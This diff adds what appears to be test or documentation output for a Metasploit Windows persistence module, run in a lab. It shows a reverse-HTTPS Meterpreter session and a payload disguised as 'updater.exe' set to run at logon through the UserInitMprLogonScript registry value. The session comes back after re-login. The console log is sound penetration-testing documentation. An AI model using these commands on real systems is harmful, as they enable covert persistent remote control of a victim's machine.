+### Initial Session
+```
+msf > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(multi/handler) >  run
+[*] Started HTTPS reverse handler on https://172.21.176.212:4444
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
+[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+Id  Name  Type                 Information       Connection
+  --  ----  ----                 -----------       ----------
+1         meterpreter x64/win  NERO\DELL @ NERO  172.21.176.212:4444 ->
+dows                                   172.21.176.1:62359 (172
+.21.176.1)
+```
+### Install Persistence
+```
+msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
+SESSION => 1
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
+LPORT => 4444
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
+PAYLOAD_NAME => updater
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
+WRITABLEDIR => C:\Users\DELL\AppData\Roaming
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
+CleanUpRc => true
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
+VERBOSE => true
+msf exploit(windows/persistence/userinit_mpr_logon_script) > check
+[+] The target is vulnerable. Registry path is writable
+msf exploit(windows/persistence/userinit_mpr_logon_script) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/userinit_mpr_logon_script) >
+[-] Handler failed to bind to 172.21.176.212:4444:-  -
+[-] Handler failed to bind to 0.0.0.0:4444:-  -
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Registry path is writable
+[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
+[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
+[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
+jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  0   Exploit: windows/pers  windows/meterpreter/r  tcp://172.21.176.212:4
+      istence/userinit_mpr_  everse_tcp             444 (setting up)
+      logon_script
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  0   Exploit: windows/pers  windows/meterpreter/r  tcp://172.21.176.212:4
+      istence/userinit_mpr_  everse_tcp             444 (setting up)
+      logon_script
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
+Stopping all jobs...
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
+
+Jobs
+====
+
+No active jobs.
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(multi/handler) > run -j
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/handler) >
+[*] Started HTTPS reverse handler on https://172.21.176.212:4444
+
+msf exploit(multi/handler) > jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  1   Exploit: multi/handle  windows/x64/meterpret  https://172.21.176.212
+      r                      er/reverse_https       :4444
+
+msf exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: NERO\DELL
+meterpreter > sysinfo
+Computer        : NERO
+OS              : Windows 11 24H2+ (10.0 Build 26200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
+Key: HKCU\Environment
+Name: UserInitMprLogonScript
+Type: REG_SZ
+Data: C:\Users\DELL\AppData\Roaming\updater.exe
+meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
+Successfully set testvalue of REG_SZ.
+meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
+Successfully deleted testvalue.
+meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
+100777/rwxrwxrwx  7168  fil  2026-03-01 05:47:24 +0200  C:\Users\DELL\AppData\Roaming\updater.exe
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information       Connection
+  --  ----  ----                 -----------       ----------
+  1         meterpreter x64/win  NERO\DELL @ NERO  172.21.176.212:4444 ->
+            dows                                   172.21.176.1:62359 (172
+                                                   .21.176.1)
+
+msf exploit(multi/handler) > sessions -K
+[*] Killing all sessions...
+[*] 172.21.176.1 - Meterpreter session 1 closed.
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+No active sessions.
+
+msf exploit(multi/handler) >
+```
+
+### Logout, and log back in
+
+```
+msf exploit(multi/handler) > 
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
+[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200
+```